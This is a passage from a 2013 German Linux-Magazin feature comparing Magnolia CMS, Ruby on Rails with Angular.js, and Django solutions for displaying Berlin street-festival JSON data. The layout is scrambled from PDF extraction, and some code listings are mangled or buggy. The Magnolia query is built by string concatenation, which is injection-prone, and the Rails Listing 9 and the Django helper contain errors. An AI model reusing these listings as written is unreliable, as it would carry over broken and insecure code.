event.getVon(), dateFormats));
19 PropertyUtil.setProperty(eventNode, "dateEnd", DateUtils.parseDate(
event.getVon(), dateFormats));
20 PropertyUtil.setProperty(eventNode, "zeit", StringUtils.replace(
event.getZeit(), "\n", " "));
21 PropertyUtil.setProperty(eventNode, "location", getLocation(event));
22 PropertyUtil.setProperty(eventNode, "bezirk", event.getBezirk());
23
24 PropertyUtil.setProperty(eventNode, "link", event.getWww());
25 PropertyUtil.setProperty(eventNode, "veranstalter",
event.getVeranstalter());
26 PropertyUtil.setProperty(eventNode, "mail", event.getMail());
27 PropertyUtil.setProperty(eventNode, "bemerkungen",
event.getBemerkungen());
28 session.save();
29 } catch (Exception e) {
30 log.error("Event konnte nicht erstellt werden, Event ID " +
event.getId() + ": " + e.getMessage());
31 }
32 }
33
34 /**
35 * Baut die Event‐Location aus Strasse und PLZ zusammen
36 *
37 * @param event Einzelnes Event aus REST‐Import
38 * @return String mit der Event‐Location
39 */
40 protected String getLocation(Index event) {
41 String location = event.getStrasse();
42 if (StringUtils.isNotEmpty(event.getPlz())) {
43 location += " (PLZ: " + event.getPlz() + ")";
44 }
45 return location;
46 }

tributs und der Methode »getLocation()«,
wie einfach das Mapping von den Json-
Quelldaten zu den Metadaten eines JCR-
Knotens ist.
Freigeben und ändern
Magnolia CMS 11/2013
Titelthema
Nach dem Import kommt zunächst die
Freigabe, sie erfolgt über die Autoreninstanz
von Magnolia CMS. Die in Abbildung
2 mit einem roten Punkt markierten
Veranstaltungen hat der Import neu angelegt,
der Redakteur kann sie freigeben.
Zudem lassen sich einzelne Veranstaltungen
löschen, ändern (Abbildung 3) oder
in einer Vorschau betrachten – Features,
die Magnolia frei Haus mitliefert.
Bis jetzt existiert pro Veranstaltung nur ein
Satz Metadaten im JCR, die Endanwender
erwarten jedoch eine HTML-Seite im
Browser. Zum Rendern der Daten bietet
Magnolia CMS sein Standard Templating
Kit (STK) an. Dessen Basis ist die weitverbreitete
Template-Engine Freemarker
Abbildung 3: Einmal importiert, lassen sich die Daten der Veranstaltungen jederzeit ändern.
www.linux-magazin.de
31

Titelthema
www.linux-magazin.de Magnolia CMS 11/2013
32
Die Suche ist Server-seitig schon unterstützt,
nur das Übersichts-Template erhielt
zusätzlich eine Referenz auf eine
neue Komponente. Diese ist wiederum
ein Template, das das Formular mit dem
Start- und Enddatum enthält. Durch diesen
modularen Aufbau kann man auf
beliebigen Seiten immer wieder die gleichen
Bausteine einfügen. Das Kalender-
Widget selber zeichnet die Komponente
»datepicker« aus der Bibliothek Jquery UI
[5] ins Browserfenster.
Zusammenfassung
01 /**
[4]. Sie kümmert sich um das Rendern
von Java-Objekten in Text. Die in Magnolia
mitgelieferten Templates enthalten
Standarddarstellungen, von Übersichtsseiten
bis zu einzelnen Komponenten wie
Kalender- oder Kommentarboxen. Für die
Anzeige der Berliner Events kommen die
02 * Prueft, ob ein Event bereits existiert
03 *
04 * @param eventPath Repository‐Pfad, in dem das Event gesucht werden soll
05 * @param eventId eindeutige ID des Events aus dem REST‐Import
06 * @param repo Repository, in dem gesucht werden soll
07 */
existierenden Templates für »Event Overview«
und »Event« zum Einsatz.
Der Entwickler hat die Standardseite
mit einem geänderten CSS-Stylesheet
versehen und vor allem die Suche von
Veranstaltungen anhand des Start- und
Enddatums umgesetzt (Abbildung 4).
08 protected boolean eventExists(String eventPath, String eventId, String repo) {
09 boolean found = false;
10
11 String sql = "select * from [nt:base] as t where ISDESCENDANTNODE([" + eventPath + "]) " +
12 "and (t.id='" + eventId + "')";
13
14 try {
15 NodeIterator posts = QueryUtil.search(repo, sql);
16 if (posts.hasNext() && posts.nextNode() != null) {
17 found = true;
18 }
19 } catch (RepositoryException e) {
20 log.error("Problem bei der Suche nach einem Event: " + e.getMessage());
21 }
22
23 return found;
24 }
Abbildung 4: Aus einem von Magnolia CMS bereits mitgelieferten Template wird mit kleinen Anpassungen die
HTML-Seite mit der Veranstaltungsübersicht.
Listing 3: Abfrage im JCR, ob Knoten bereits existiert
Magnolia CMS bietet offenbar eine solide
Basis für den Aufbau einer Webpräsenz.
Die Trennung der Daten von der Darstellung
mittels Java Content Repository
und Templates vermeidet Probleme beim
Anpassen des Aussehens von Anfang an.
Auch das Anbinden von Fremddaten mit
eigenem Java-Quelltext lässt sich zügig
umsetzen, durch den Einsatz des Content
Repository ergibt sich zugleich ein
Caching. Das Template-Konzept für die
Darstellung ist in sich schlüssig, wer gravierende
Änderungen an den vorhandenen
Templates vornimmt, muss jedoch
einiges an Lernaufwand vorsehen. Positiv
fällt die umfangreiche Dokumentation
auf der Webseite [1] auf. (mhu) n
Infos
[1] Magnolia CMS:
[http:// www. magnolia‐cms. com]
[2] Information über Feste als Json:
[http:// www. berlin. de/ sen/ wirtschaft/​
service/ maerkte/ strassenfeste/ index. php/​
index/ all. json? q=]
[3] Google-Gson:
[http:// code. google. com/ p/ google‐gson/]
[4] Freemarker: [http:// freemarker. org]
[5] Jquery UI: [http:// jqueryui. com]
[6] Listings zu diesem Artikel:
[http:// www. linux‐magazin. de/ static/​
listings/ magazin/ 2013/ 11/ magnolia‐cms]
Der Autor
Carsten Zerbst arbeitet als Teamleiter im CADund
PDM-Umfeld für die Automobil-, Luft- und
Raumfahrtindustrie. Er konzentriert sich auf die
Beratung und Erstellung von Java-basierter Individualsoftware
zur optimalen Unterstützung der
Arbeitsabläufe. Zur Zeit ist er auf der Suche nach
neuen Teammitgliedern.

Titelthema
www.linux-magazin.de Ruby on Rails 11/2013
34
Ruby on Rails plus Angular.js
Flexible Unterlage
Das Webframework Ruby on Rails nimmt dem Entwickler viel Arbeit ab und lässt sich doch weitgehend anpassen.
In der Beispielanwendung liefert es lediglich die Daten im Json-Format, das Anzeigen im Browser übernimmt
die Javascript-Bibliothek Angular.js. Jan Krutisch
die als Vorgänger von Bibliotheken wie
Jquery gelten können, im Rails-Umfeld
entstanden. Rails war zudem eines der
ersten Frameworks, die es dem Entwickler
leicht gemacht haben, Webseiten mit
Ajax-Funktionen anzureichern.
Rails nutzt dabei die Sprachmittel von
Ruby sehr geschickt, um dynamisch zur
Laufzeit Informationen zur Verfügung zu
stellen, die in anderen Umgebungen bereits
zur Entwurfszeit in Code gegossen
werden.
© Graham Oliver, 123RF.com
Ruby on Rails ist ein Webframework auf
Basis der Programmiersprache Ruby. Im
Jahr 2004 hat es der dänische Entwickler
David Heinemeier Hansson erstmals als
Open Source veröffentlicht, inzwischen
liegt die kurz auch Rails [1] genannte
Software in der frisch gebackenen Version
4 vor.
Rails verspricht die Entwicklung von
Datenbank-gestützten Webanwendungen
stark zu beschleunigen. Zusammen
mit dem Python-Framework Django begründete
es eine neue Klasse von sehr
01 # 20130903183431_create_events.rb
02 class CreateEvents < ActiveRecord::Migration
03 def change
04 create_table :events do |t|
05 t.string :source_id
06 t.text :area
07 t.text :description
08 t.string :street
09 t.string :zip_code
10 t.date :starts_at
11 t.date :ends_at
Listing 1: Datenbank-Migration
kompletten Frameworks, zu denen zum
Beispiel auch das PHP-Framework Symfony
zu zählen ist, die dem Entwickler an
vielen Stellen Arbeit abnehmen, typische
Aufgaben mit Generatoren und anderen
Konstrukten automatisieren und es einfach
machen, Best Practices der Webentwicklung
zu folgen.
Über seine nun bald zehnjährige Geschichte
hat Rails zahlreiche Trends in
der Webentwicklung mitgeprägt oder
zumindest früh aufgegriffen. So sind
etwa Prototype.js und Script.aculo.us,
12 t.text :period
13 t.text :host
14 t.string :email
15 t.string :website
16 t.text :note
17 t.timestamps
18 end
19
20 add_index :events, :source_id
21 end
22 end
Die Anwendung
Eine laufende Version der gelösten Aufgabe
(Abbildung 1) findet sich unter
[2]. Der Quellcode liegt unter [3] und
lässt sich, sofern Ruby 2.0.0 installiert
ist, recht einfach auch lokal betreiben.
Eine genaue Beschreibung der weiteren
Abhängigkeiten ist in der Readme-Datei
im Quelltext nachzulesen.
Eine typische Rails-Anwendung folgt im
Wesentlichen einer eigenen Interpretation
des allgegenwärtigen Model-View-Controller-Pattern
(MVC). Die Modelle sind
in der Regel so genannte »ActiveRecord«-
Objekte, die mit Hilfe von Introspektion
auf die Datenbank ohne zusätzlichen
Code aus den Datenbankspalten Attribute
und Methoden generieren.
Da es bei den vorgegebenen Daten um
Festivitäten – neudeutsch Events – geht,
liegt es nahe, ein Event-Model zu bauen.
Es lässt sich, zusammen mit einer Migration,
die das Datenbankschema anlegt,
Der Programmierer
Der Code stammt von Daniel Harrington
[https:// github. com/ rubiii]. Er ist freiberuflicher
Entwickler in Hamburg und arbeitet
aktuell vorwiegend mit Ruby und Javascript.

Abbildung 1: Die Beispielanwendung verwendet einen Schieberegler (Slider)
zur Datumseingrenzung und läuft auf der Plattform Heroku.
über einen Kommandozeilenaufruf generieren
(hier nur ausschnittweise):
$ rails generate model Event source_id:U
string area:text description:text U
street:string [...]
Der Generator produziert drei Dateien:
das etwas anämische Model (die Klasse
»Event«), einen vorerst ebenso spartanischen
Test namens »EventTest« und die
eben erwähnte Migration (Listing 1).
Datenbank-Migrationen
Migrationen in Rails sind möglichst Datenbank-agnostische
Dateien, die in
Ruby-Code beschreiben, wie das Schema
der Datenbank zu ändern ist. Da diese
Migrationen versioniert sind, kann man
mit ihnen eine Datenbank automatisiert
auf den aktuellen Stand bringen. Dafür
ist eine Rake-Task zuständig. Rake [4] ist
das leistungsfähige Ruby-Äquivalent zu
Make und dient für allerlei Automatisierungen.
Das Kommando »rake db:migrate«
migriert das Datenbankschema auf den
neuesten Stand.
Um die Daten in die Datenbank zu importieren,
existiert eine weitere Rake-Task,
die allerdings selbst gebaut ist: »rake
workers:import« ruft die Daten alle auf
einmal vom Berlin.de-Server ab, übersetzt
die Attribute in die Datenstruktur
für die Event-Klasse und legt dann je
nach Stand der Datenbank neue Events
an oder aktualisiert alte. Eine solche Task
lässt sich per Cron regelmäßig ausführen.
Die Task selbst ruft eigentlich nur
eine Methode einer Klasseninstanz auf
(Listing 2)
Der »ImportWorker« liegt im Verzeichnis
»app/workers/«. Dies ist kein Standardverzeichnis,
Rails lädt jedoch automatisch
alle Dateien, die in Unterverzeichnissen
von »app/« liegen.
Der Worker holt in einem
Rutsch mit Hilfe
der Bibliothek HTTP-
Client [5] die Inhalte
vom Berlin.de-Server,
benutzt Rubys Json-
Bibliothek, um das
ganze zu parsen, und
schreibt dann, Event
für Event, die Inhalte
in die Datenbank.
Hierzu gibt es eine
Mapping-Methode, die die Feldnamen
in den Json-Daten in Datenbankattribute
übersetzt, sowie eine »upsert_event()«-
Methode, die ein Event entweder anlegt
oder aktualisiert (Listing 3).
Die Methode »upsert_event« zeigt sehr
schön die Benutzung der Objekt-Abstraktionsschicht
»ActiveRecord«: Unter der
Haube von »ActiveRecord« arbeitet eine
ausgereifte Bibliothek für den Umgang
mit relationaler Algebra. Hier ist der Fall
eindeutig – die »where()«-Methode erzeugt
eine SQL-»WHERE«-Klausel in der
Form »WHERE source_id = ?«.
Das »first_or_initialize« liefert entweder
den ersten Treffer der Abfrage zurück
oder aber ein leeres Objekt, wenn kein
Treffer gefunden, das Event also noch
nicht importiert wurde. Die Methode
»update_attributes« aktualisiert die Attribute
und speichert das Ganze in der
Datenbank.
Die nächste Schicht im Rails-MVC-Modell
ist der Controller, der den HTTP-Request
entgegennimmt und beantwortet. Wie
Listing 4 zeigt, ist er recht simpel. Den
Request nimmt die »index«-Methode
entgegen. Das »respond_to« legt fest,
dass dieser Controller nur auf Anfragen
Listing 3: »ImportWorker«
01 class ImportWorker
02 [...]
03 def map_to_event_hash(data)
04 {
05 source_id: data['id'],
06 area: data['bezirk'],
07 description: data['bezeichnung'],
08 street: data['strasse'],
09 zip_code: data['plz'],
10 starts_at: Date.parse(data['von']),
11 ends_at: Date.parse(data['bis']),
12 period: data['zeit'],
13 host: data['veranstalter'],
reagiert, die Json verlangen. In der Index-Methode
liest »Event.all« die ganze
Events-Tabelle aus. Die Berliner Datenquelle
liefert derzeit knapp 300 Events,
sodass sich die Rechenarbeit in Grenzen
hält. Das »respond_with()« sorgt dafür,
dass die Daten im richtigen Datentypus
ausgegeben werden. »ActiveRecord«
bringt für Json und XML bereits eigene
Methoden zur Konvertierung mit, sodass
der Entwickler hier der Einfachheit halber
die rohen Daten aus der Datenbank
ausgeben darf.
Templates
Unter Praxisbedingungen ist der Programmierer
oft gezwungen die Daten
vor der Ausgabe noch zu modifizieren.
Hierfür gibt es derzeit zwei besonders
geeignete Ansätze: Die so genannten
Jbuilder-Templates, die Teil von Rails
4 sind, erlauben es, Json mit einer Art
Templating-Sprache zusammenzubauen
– angelehnt an die Builder-Bibliothek, die
in Rails zum Generieren von XML dient.
Die »ActiveModel«-Serializer gehen einen
anderen Weg, indem sie eine eigene Kategorie
von Klassen einführen, die Serializer,
die mit einer ebenfalls recht simplen
Syntax das Umarbeiten von Datenstrukturen
ermöglichen.
Damit liegt unter »/events.json« also
eine vollständige Liste von Events als
Listing 2: Import-Task
01 namespace :workers do
02 desc 'Import events from source'
03 task :import => :environment do
04 ImportWorker.new.run
05 end
06 end
14 email: data['mail'],
15 website: data['www'],
16 note: data['bemerkung']
17 }
18 end
19
20 def upsert_event(source_id, attributes)
21 Event.where(source_id: source_id)
22 .first_or_initialize
23 .update_attributes(attributes)
24 end
25 end
Ruby on Rails 11/2013
Titelthema
www.linux-magazin.de
35

Titelthema
www.linux-magazin.de Ruby on Rails 11/2013
36
Json-Daten (Abbildung 2). Nun geht es
darum, sie in der gewünschten Form anzuzeigen.
Die View-Schicht in Rails besteht im
Prinzip nur aus Templates. Diese verwenden
standardmäßig eine Template-
Engine namens Embedded Ruby (ERB),
es existiert allerdings noch eine Handvoll
Alternativen. Der Anwendungsautor hat
sich hier für eine relativ moderne Variante
namens Slim [6] entschieden, die
mit signifikantem Whitespace und einer
sehr reduzierten Syntax auskommt. Das
01 class EventsController < ApplicationController
02
03 respond_to :json
04
05 def index
06 respond_with(Event.all)
07 end
08
09 end
Listing 4: Controller
Template, das die Homepage rendert, ist
in Listing 5 zu sehen.
Layouts
Natürlich entsteht so keine vollständige
HTML-Seite. Templates in Rails werden
in aller Regel in ein so genanntes Layout
gegossen, ein Template, das den Seitenrahmen
enthält und eine Stelle definiert,
an der der Code der Einzelseiten erscheinen
soll. Auch dieses ist in Slim geschrieben
(Listing 6)
Die »ng«-Attribute deuten es schon an:
Der Anwendungsentwickler hat es sich
nicht nehmen lassen, zusätzlich zu Rails
noch eine derzeit angesagte Technologie
mit ins Spiel zu bringen: Das Frontend ist
mittels Angular.js [7], einem Javascript-
Framework von Google, realisiert. Das
Template rendert hier gewissermaßen
nur ein Template für Angular.js. Bis auf
die Überschrift übernimmt Angular alle
Elemente und zeigt sie dynamisch zur
Laufzeit an.
Angular.js
Damit verlässt der Entwickler die Ebene
des Server-seitigen Rails und landet bei
Javascript im Client. Da die Beschreibung
der Angular-Anwendung den Rahmen
dieses Artikels sprengen würde, sei nur
so viel gesagt: Die Angular-Anwendung
lädt als Erstes die Daten von »/events.js«
und filtert diese dann eigenständig nach
Start- und Enddatum.
Die Angular.js-Anwendung ist in Coffeescript
geschrieben, einer Sprache, die
ein wenig an Ruby erinnert und nach
Javascript kompiliert. Rails unterstützt
Coffeescript mit der so genannten Asset-
Pipeline. Hierbei handelt es sich um ein
Feature, das seit Rails 3.1 an Bord ist: Es
verarbeitet alle Dateien, die unter »app/
assets/« liegen. Wesentliche Aufgaben
Listing 5: Slim-Template
01 h1 Berliner und Brandenburger Volks‐ und Straßenfeste 2013
02
03 #events ng‐controller='eventsController'
04 #range‐slider
05 .range‐info
06 span.count
07 | {{groupedEventsCount}} Veranstaltungen
08 span
09 | im gewählten Zeitraum
10
11 div class='ongoing‐events' ng‐show='groupedEvents.ongoing'
ng‐cloak=''
12 h2
13 | {{groupedEvents.ongoing.length}} laufende Veranstaltung(en)
14 ol.events
15 li ng‐repeat='event in groupedEvents.ongoing'
16 p
17 | {{event.description}}
18 time
19 | {{event.startsAt | date:'dd.MM.yyyy'}} ‐ {{event.endsAt |
date:'dd.MM.yyyy'}}
20 span
21 | in {{event.area}}
22
23 div class='upcoming‐events' ng‐show='groupedEvents.upcoming'
ng‐cloak=''
24 h2
25 | {{groupedEvents.upcoming.length}} anstehende Veranstaltung(en)
26 ol.events
27 li ng‐repeat='event in groupedEvents.upcoming'
28 p
29 | {{event.description}}
30 time
31 | {{event.startsAt | date:'dd.MM.yyyy'}} ‐ {{event.endsAt |
date:'dd.MM.yyyy'}}
32 span
33 | in {{event.area}}
34
35 div class='passed‐events' ng‐show='groupedEvents.passed' ng‐cloak=''
36 h2
37 | {{groupedEvents.passed.length}} vergangene Veranstaltung(en)
38 ol.events
39 li ng‐repeat='event in groupedEvents.passed'
40 p
41 | {{event.description}}
42 time
43 | {{event.startsAt | date:'dd.MM.yyyy'}} ‐ {{event.endsAt |
date:'dd.MM.yyyy'}}
44 span
45 | in {{event.area}}
Listing 6: Slim-Layout
01 doctype html
02 html
03 head
04 title Festive
05 = stylesheet_link_tag 'application'
06 = javascript_include_tag 'application'
07 = csrf_meta_tags
08
09 body ng‐app='Festive'
10 #content
11 == yield
12
13 #footer
14 | Source code available at
15 a href='https://github.com/rubiii/festive' github.com/rubiii/
festive

Abbildung 2: Ruby on Rails liefert in der Beispielanwendung Json-Daten für die Anzeige.
der Asset-Pipeline sind das Zusammenfügen
mehrerer Quelldateien, etwa um
Stylesheets besser aufteilen zu können,
ohne im Produktivbetrieb alle Stylesheets
einzeln laden zu müssen, sowie das Einbinden
von diversen Compilern und Minifiern
wie Uglify.js, Google Closure oder
der YUI-Tools.
Im Development-Modus ist standardmäßig
das Minifizieren und Zusammenführen
ausgeschaltet, was das Debuggen erleichtert.
Beim Deployment packt eine
Rake-Task die Assets zusammen, führt
die Minification durch und legt die Dateien
nach »public/assets/«, von wo der
Webserver sie ausliefern kann. Wie in
dem Layout zu sehen ist, integriert die
Anwendung genau eine Javascript-Datei
namens »application« – die Endung ».js«
versteht sich implizit.
Zunächst bindet Listing 7 die Bibliothek
Jquery [8] ein, die »range‐slider« benötigt.
Danach kommen Underscore.js [9]
und Angular.js. Da es sich bei den Bibliotheken
um externe Abhängigkeiten handelt,
liegen sie nicht im Verzeichnis »app/
assets/«, sondern in »vendor/assets/«.
Als Letztes bindet Rails alle Javascript-
(oder Coffeescript-)Dateien ein, die sich
in »app/assets/javascripts/« oder Unterordnern
davon befinden.
Die externen Abhängigkeiten verwaltet
übrigens wenn möglich Bower [10]. Das
Tool wurde von Twitter entwickelt und
hat sich zu einem De-facto-Standard für
das Javascript-Paketmanagement gemausert.
Bower speichert die Abhängigkeiten
in einem Format, das an das Json-Format
der Node.js-Pakete erinnert. Die »bower.
json«-Datei des Projekts zeigt Listing 8.
Zusätzlich muss in einer Datei namens
».bowerrc« der Zielpfad stehen:
{
"directory": "vendor/components"
}
Danach kann der Anwender die benötigten
Pakete mit dem Kommando »bower
install« installieren.
Beurteilung
Die gewählte Lösung hat bei aller Attraktivität
des dynamischen Frontends das
Problem, dass sie ohne Javascript nicht
funktioniert. Eine Lösung, die komplett
ohne Javascript auskommt, wäre sicher
nicht viel aufwändiger zu programmieren.
Zum Beispiel könnte der »Events-
Controller« den anzuzeigenden Datumsbereich
gleich Server-seitig verarbeiten
(Listing 9).
Gleichwohl demonstriert die Anwendung
die Flexibilität von Rails, die es einfach
macht, als Alternative zu einer normalen
Webanwendung eine Single-Page-App
plus Json-API zu bauen. Das ist gerade
in den jüngsten Rails-Versionen deutlich
leichter geworden.
Eine der Stärken von Rails ist die gute
Integration von automatisierten Tests.
Die Beispielanwendung ist keine Ausnahme:
Der Test für den »ImportWorker«
importiert versuchsweise Testdaten, die

Titelthema
www.linux-magazin.de Ruby on Rails 11/2013
38
nicht im Web, sondern einfach in einer
Datei, im Rails-Jargon Fixture genannt,
abgelegt sind. Ermöglicht wird dies durch
das so genannte Mocken des eigentlichen
HTTP-Requests mit Hilfe der Mocking-
Bibliothek Mocha [11].
Unter »/test/integration« gibt es zudem
einen Integrationstest, der die Bibliothek
Capybara und den Selenium-Webdriver
[12] verwendet, um echte Frontend-Integration-Tests
in einem Webbrowser auszuführen,
was bei dieser Art Anwendung
fast zwingend notwendig ist.
Zusätzlich zu diesen Rails-Tests bringt
die Beispielanwendung auch noch einen
Javascript-Test mit. Er ist mit dem
Projekt Karma [13] realisiert, das aus
dem Angular.js-Umfeld kommt. Die Besonderheit
von Karma ist, dass es die
Tests parallel in einer ganzen Reihe von
Browsern ausführen kann und die Ergebnisse
anschließend zusammenführt.
All diese automatisierten Tests der Anwendung
laufen auch auf der gehosteten
Continuous-Integration-Plattform Travis-
CI [14].
Die von der Redaktion gestellte Programmieraufgabe
ist keine besonders passende
01 #= require jquery/jquery
02 #= require underscore/underscore
03 #= require angular/index
04 #
05 #= require range‐slider
06 #= require_tree .
01 {
02 "name": "festive",
03 "version": "0.1.0",
04 "dependencies": {
05 "jquery": "1.9.1",
06 "underscore": "1.4.3",
07 "angular": "http://code.angularjs.org/1.2.0‐rc.2/angular.js",
01 class EventsController < ApplicationController
02
03 respond_to :json
04
05 def index
Anforderung an Rails.
Viele Ruby-Entwickler
hätten für diese Aufgabe
vielleicht eher
ein Mikroframework
wie Sinatra eingesetzt
und die Json-Anfragen
einfach durchgereicht
oder nur in einem
Memory-Cache zwischengespeichert.
Ausblick
08 "angular‐mocks": "http://code.angularjs.org/1.2.0‐rc.2/angular‐mocks.js"
09 }
10 }
Rails spielt seine Stärken
vor allem dort
aus, wo schnell, effizient,
aber auch sorgfältig Webanwendungen
entstehen sollen – nicht umsonst
ist Rails insbesondere bei Startups sehr
beliebt. Wer sich an die von Rails vorgegebenen
Konventionen hält, ist als Entwickler
außerdem deutlich weniger mit
dem Schreiben des typischen Boilerplate-
Codes beschäftigt.
Natürlich schläft die Konkurrenz nicht.
Die Rails-Gemeinde ist jedoch immer
noch sehr weit vorne dabei, wenn es
darum geht, Trends gerade im Tooling
zu setzen. Die Asset-Pipeline, in diesem
Artikel kurz erwähnt, ist mit Rails 4
endlich erwachsen geworden und sorgt
zusammen mit dem gesamten Ökosystem
und Tools wie Sass, Compass oder
Coffeescript dafür, dass Frontend-Entwicklung
einen ähnlichen Stellenwert
06 respond_with(Event.where("starts_at = ?", params[:end_date], params[:start_date]))
07 end
08
09 end
Listing 7: Javascript
Listing 8: »bower.json«
Listing 9: Alternativer Controller
Abbildung 3: Das Testwerkzeug Karma prüft das Javascript der Anwendung
parallel in mehreren Webbrowsern.
erhält wie das Back end. Dennoch bleibt
abzuwarten, wie sich das gesamte Web-
Tooling in den nächsten Jahren verändert
und ob die Rails-Community Wege
findet, aktuelle Entwicklungen wie die
Javascript-Tools Grunt und Bower besser
zu integrieren. Ansonsten könnte sie am
Ende mit eigenen Insellösungen dastehen.
(mhu)
n
Infos
[1] Ruby on Rails:
[http:// www. rubyonrails. org]
[2] Laufende Instanz auf Heroku:
[http:// festive‐rails. herokuapp. com]
[3] Quellcode auf Github:
[https:// github. com/ rubiii/ festive]
[4] Rake: [http:// rake. rubyforge. org]
[5] Bibliothek »HTTPClient«:
[https:// github. com/ nahi/ httpclient]
[6] Slim-Templates: [http:// slim‐lang. com]
[7] Angular.js: [http:// angularjs. org]
[8] Jquery: [http:// jquery. com]
[9] Underscore.js: [http:// underscorejs. org]
[10] Bower: [https:// github. com/ bower/ bower]
[11] Mocha:
[http:// gofreerange. com/ mocha/ docs/]
[12] Capybara:
[https:// github. com/ jnicklas/ capybara]
[13] Karma: [http:// karma‐runner. github. io/ 0.​
10/ index. html]
[14] Beispielanwendung auf Travis-CI: [https://​
travis‐ci. org/ rubiii/ festive]
Der Autor
Jan Krutisch [http:// jan. krutisch. de] ist freiberuflicher
Software-Entwickler und Autor. Er arbeitet
momentan vor allem für Verlage an Themen
wie mobile Websites und E-Books.

Das Python-Framework Django
Django unchained
Django 11/2013
Titelthema
Alle befragten Django-Entwickler waren über die vom Linux-Magazin gestellte Aufgabe nicht glücklich: Mit einem
CMS sei das wesentlich einfacher zu lösen, hieß es. Autor Sven Schannak zeigt, wie es trotzdem klappt. Sven Schannak
www.linux-magazin.de
39
Mit Django 1.5, das die vom
Linux-Magazin gestellte Aufgabe bewältigen
soll, betritt ein in Python verfasstes
Framework die illustre Runde. Seit Version
1.3 bringt Django die so genannten
Class-based Views (CBV) mit, die den
Zeitaufwand für das Entwickeln weniger
komplexer Aufgaben minimieren. Grundlage
für den Code bieten die offizielle
Django-Doku [1] und die Anregungen
aus dem Referenzwerk „Two Scoops of
Django“ [2]. Zum besseren Verständnis
der hier eingesetzten Techniken empfiehlt
sich zudem der Blick in das Tutorial des
Django-Projekts [3].
Doch die CBV kosten: Wer sie nutzen
will, muss eine steilere Lernkurve akzeptieren
als bei den traditionellen Functional-based
Views (FBV). Aber durch die
Zeitersparnis beim Entwickeln lohnt sich
der Mehraufwand am Ende. FBVs ließen
sich für die Lösung der Aufgabe aber
auch verwenden.
An die Quelle
Um die offene Datenquelle anzuzapfen
und die Berliner und Brandenburger
Volks- und Straßenfeste [4] auf einer
Webseite anzuzeigen, lässt sich das
mitgelieferte REST-API mit XML- oder
Json-Schnittstellen einsetzen. Das Python-Framework
kann zwar mit beiden
Datentypen arbeiten, im Artikel kommt
jedoch Json als favorisiertes Format zum
Einsatz. Um außerdem nicht ständig Requests
an den Portalbetreiber zu senden,
soll Django die Daten cachen und aufbereiten,
falls ein Besucher der Webseite
zum Beispiel nach dem Termin für das
Berliner Bierfestival [5] sucht.
Um die Daten serverseitig zu holen, gibt
es mehrere Ansätze: Zum Beispiel ließe
sich das Task-Framework Celery mit dem
Plugin »django‐celery« einspannen, das
einige großartige Funktionen für das
Bewältigen periodisch wiederkehrender
Aufgaben mitbringt. Allerdings wäre
der Konfigurationsaufwand recht hoch,
weshalb ein so genannter Management-
Befehl diese Aufgabe übernimmt. Ihn ruft
der Entwickler direkt aus der Shell heraus
auf. Er lässt sich als Cronjob einrichten,
der die Daten regelmäßig von der Quelle
abholt und aktualisiert. Die Entwicklung
dieses Befehls macht den Anfang des Artikels.
Nach dem Einrichten von Django [1] erstellt
der Programmierer zunächst eine
App mit dem Namen »streetparty«:
django‐admin.py startapp streetparty
Der Management-Befehl gehört in einen
Ordner mit dem Namen »management«,
den er unterhalb von »streetparty« anlegt.
Darin legt er zudem eine leere Datei mit
der Bezeichnung »__init__.py« und einen
weiteren Ordner »commands« an, welcher
ebenfalls eine Datei »__init__.py«
enthalten soll. An ihr erkennt Python,
dass sich in den Ordnern Python-Skripte
befinden. Im Verzeichnis »commands«
erstellt der Entwickler zudem die Datei
mit dem Code zum Holen der Daten.
Im Beispiel heißt sie »get_data.py« und
enthält den Code aus Listing 1.
Management-Befehle ähneln sich stets im
Aufbau: Es muss eine Klasse »Command«
geben, die mindestens von »BaseCommand«
erbt. In der Methode »handle()«
wird dann die eigentliche Logik implementiert,
wobei Management-Befehle
Listing 1: »get_data.py«
01 from django.core.management.base import BaseCommand
02 from streetparty.helper import StrassenFestHelper
03
04
05 class Command(BaseCommand):
06 help = 'Holt die aktuellen Daten der
Straßenfeste'
07
08 def handle(self, *args, **options):
09 StrassenFestHelper().update()
10
© Elnur Amikishiyev, 123RF.com

Titelthema
www.linux-magazin.de Django 11/2013
40
auch Argumente empfangen können. Das
Beispiel bindet zusätzlich noch einen Hilfetext
ein.
Hilfe beim Straßenfest
Die Methode selbst ruft eine andere Methode
der Klasse »StrassenFestHelper«
auf, die später implementiert wird und
die Daten in die Datenbank schreibt.
Diese Klasse in der neu anzulegenden
Listing 2: »helper.py«
Datei »streetparty/helper.py« schreibt der
Django-Entwickler. Den Code für die Helferklasse
zeigt Listing 2.
In der vorgegebenen Datenquelle ist ein
»id«-Feld vorhanden, allerdings verrät die
Dokumentation nicht, ob die IDs eindeutig
vergeben sind. Bekommen zwei
Feste zufälligerweise die gleiche ID zugewiesen,
kann es zu Konflikten kommen.
Daher löscht die Funktion »update()« die
Datensätze zunächst, um sie dann komplett
neu einzuspielen. Im Modell sichert
das Feld »api_id« die ID der Datenquelle.
Um letztere nicht als Primary Key zu verwenden,
setzt die Funktion den Schlüssel
für »id« auf »api_id« um.
Formatprüfung
Da man prinzipiell Daten von anderen
Seiten auf Korrektheit überprüfen sollte,
wird zudem die Methode »full_clean«
01 import sys
02 import json
03 import urllib2
04 from datetime import datetime
05 from django.conf import settings
06 from django.core.exceptions import ValidationError
07 from streetparty.models import StrassenFest
08
09 class StrassenFestHelper():
10 def update(self):
11 req = urllib2.Request(settings.STREETPARTY_DATA_URL)
12 opener = urllib2.build_opener()
13 source = opener.open(req)
14 StrassenFest.objects.all().delete()
15
16 for data in json.load(source)['index']:
17 data['von'] = datetime.strptime(data['von'], '%Y-%m-%d')
18 data['bis'] = datetime.strptime(data['bis'], '%d.%m.%Y')
19 data['api_id'] = data.pop('id')
20 fest = StrassenFest(**data)
21 try:
22 fest.full_clean()
23 except ValidationError as e:
24 print >>sys.stderr, 'Failed to validate remote entry
with id %s' % data['id']
25 print >>sys.stderr, str(e)
26 else:
27 fest.save()
Listing 3: »models.py«
01 from django.db import models
02
03 # Create your models here.
04 class StrassenFest(models.Model):
05 # so, id cannot overwrite the database‐id
06 api_id = models.CharField(max_length=255, blank=True)
07 bezeichnung = models.TextField()
08 # adress‐data should normally be normalized
09 bezirk = models.CharField(max_length=255, blank=True)
10 strasse = models.CharField(max_length=255, blank=True)
11 plz = models.CharField(max_length=5, blank=True)
12 von = models.DateField()
13 bis = models.DateField()
14 zeit = models.CharField(max_length=255, blank=True)
15 veranstalter = models.TextField(blank=True)
16 mail = models.EmailField(blank=True)
17 www = models.CharField(max_lenght=255, blank=True)
18 bemerkungen = models.TextField(blank=True)
Listing 4: »views.py«
01 from django.views.generic import ListView
